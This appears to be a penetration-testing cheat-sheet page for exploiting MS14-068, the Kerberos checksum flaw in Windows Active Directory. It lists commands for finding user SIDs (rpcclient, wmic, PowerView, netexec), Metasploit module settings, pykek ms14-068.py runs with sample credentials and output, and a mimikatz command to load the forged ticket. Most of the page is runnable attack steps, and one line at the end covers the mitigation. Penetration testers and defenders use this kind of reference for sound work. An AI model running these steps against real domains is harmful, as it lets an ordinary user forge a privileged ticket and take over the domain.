# MS14-068 Checksum Validation This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine. * RPCClient ```powershell rpcclient $> lookupnames john.smith john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1) ``` * WMI ```powershell wmic useraccount get name,sid Administrator S-1-5-21-3415849876-833628785-5197346142-500 Guest S-1-5-21-3415849876-833628785-5197346142-501 Administrator S-1-5-21-297520375-2634728305-5197346142-500 Guest S-1-5-21-297520375-2634728305-5197346142-501 krbtgt S-1-5-21-297520375-2634728305-5197346142-502 lambda S-1-5-21-297520375-2634728305-5197346142-1110 ``` * Powerview ```powershell Convert-NameToSid high-sec-corp.localkrbtgt S-1-5-21-2941561648-383941485-1389968811-502 ``` * netexec: `netexec ldap DC1.lab.local -u username -p password -k --get-sid` ```bash Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 ``` Generate a ticket with `metasploit` or `pykek` ```powershell Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL PASSWORD P@ssw0rd yes The Domain User password RHOSTS 10.10.10.10 yes The target address range or CIDR identifier RPORT 88 yes The target port Timeout 10 yes The TCP timeout to establish connection and read data USER lambda yes The Domain User USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000 ``` ```powershell # Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek $ git clone https://github.com/SecWiki/windows-kernel-exploits $ python ./ms14-068.py -u @ -s -d -p $ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org $ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10 $ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066 -1105 [+] Building AS-REQ for msfdc01.metasploitable.local... Done! [+] Sending AS-REQ to msfdc01.metasploitable.local... Done! [+] Receiving AS-REP from msfdc01.metasploitable.local... Done! [+] Parsing AS-REP from msfdc01.metasploitable.local... Done! [+] Building TGS-REQ for msfdc01.metasploitable.local... Done! [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done! [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done! [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done! [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done! ``` Then use `mimikatz` to load the ticket. ```powershell mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" ``` ## Mitigations * Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780 ## References * [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)